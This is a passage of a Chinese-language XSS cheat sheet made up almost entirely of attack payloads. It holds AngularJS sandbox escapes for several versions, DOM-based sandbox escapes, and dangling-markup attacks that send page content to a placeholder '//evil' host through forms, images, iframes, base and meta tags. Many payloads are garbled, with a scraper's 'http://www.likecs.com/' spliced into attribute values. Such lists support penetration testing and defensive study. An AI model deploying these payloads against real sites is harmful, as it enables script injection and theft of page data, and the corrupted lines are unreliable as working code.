跨站脚本（XSS）备忘单-2019版 (6)

版本：1.5.9-1.5.11

{{ c=''.sub.call;b=''.sub.bind;a=''.sub.apply; c.$apply=$apply;c.$eval=b;op=$root.$$phase; $root.$$phase=null;od=$root.$digest;$root.$digest=({}).toString; C=c.$apply(c);$root.$$phase=op;$root.$digest=od; B=C(b,c,b);$evalAsync(" astNode=pop();astNode.type='UnaryExpression'; astNode.operator='(window.X?void0:(window.X=true,alert(1)))+'; astNode.argument={type:'Identifier',name:'foo'}; "); m1=B($$asyncQueue.pop().expression,null,$root); m2=B(C,null,m1);[].push.apply=m2;a=''.sub; $eval('a(b.c)');[].push.apply=a; }}

版本：> = 1.6.0

{{constructor.constructor('alert(1)')()}}

版本：> = 1.6.0（较短）

{{$on.constructor('alert(1)')()}}

基于DOM的AngularJS沙箱逃逸

所有版本（Chrome）

<input autofocus ng-focus=http://www.likecs.com/"$event.path|orderBy:'[].constructor.from([1],alert)'">

所有版本（Chrome）较短

<input id=x ng-focus=$event.path|orderBy:'(z=alert)(1)'>

所有版本（所有浏览器）都较短

<input autofocus ng-focus=http://www.likecs.com/"$event.composedPath()|orderBy:'[].constructor.from([1],alert)'">

版本：1.2.0-1.5.0

<div ng-app ng-csp><div ng-focus="x=$event;" id=f tabindex=0>foo</div><div ng-repeat="(key, value) in x.view"><div ng-if="key == 'window'">{{ [1].reduce(value.alert, 1); }}</div></div></div> 无脚本攻击

背景属性

<body background="//evil? <table background="//evil? <table><thead background="//evil? <table><tbody background="//evil? <table><tfoot background="//evil? <table><td background="//evil? <table><th background="//evil?

链接href样式表

<link rel=stylesheet href=http://www.likecs.com/"//evil?

链接href图标

<link rel=icon href=http://www.likecs.com/"//evil?

Meta刷新

<meta http-equiv=http://www.likecs.com/"refresh" content=http://www.likecs.com/"0; ?

Img通过src属性传递标记

<img src="//evil? <image src="//evil?

使用track元素的视频

<video><track default src=http://www.likecs.com/"//evil?

使用sourcr元素和src属性的视频

<video><source src="//evil?

使用source元素和src属性的音频

<audio><source src=http://www.likecs.com/"//evil?

输入src

<input type=image src=http://www.likecs.com/"//evil?

使用formaction的按钮

<form><button style=http://www.likecs.com/"width:100%;height:100%" type=submit formaction=http://www.likecs.com/"//evil?

使用formaction输入

<form><input type=submit value=http://www.likecs.com/"XSS" style=http://www.likecs.com/"width:100%;height:100%" type=submit formaction=http://www.likecs.com/"//evil?

表单使用action

<button form=x style=http://www.likecs.com/"width:100%;height:100%;"><form id=x action=http://www.likecs.com/"//evil?

使用src属性的Isindex

<isindex type=image src=http://www.likecs.com/"//evil?

Isindex使用submit

<isindex type=submit style=width:100%;height:100%; value=XSS formaction=http://www.likecs.com/"//evil?

Object data

<object data=http://www.likecs.com/"//evil?

iframe src

<iframe src=http://www.likecs.com/"//evil?

Embed src

<embed src=http://www.likecs.com/"//evil?

使用textarea标记并发布到外部站点

<form><button formaction=http://www.likecs.com//evil>XSS</button><textarea name=x>

使用表单目标通过window.name传递标记数据

<button form=x>XSS</button><form id=x action=http://www.likecs.com//evil target='

使用基本目标通过window.name传递标记数据

<a href=http://subdomain1.portswigger-labs.net/dangling_markup/name.html><font size=http://www.likecs.com/100 color=red>You must click me</font></a><base target="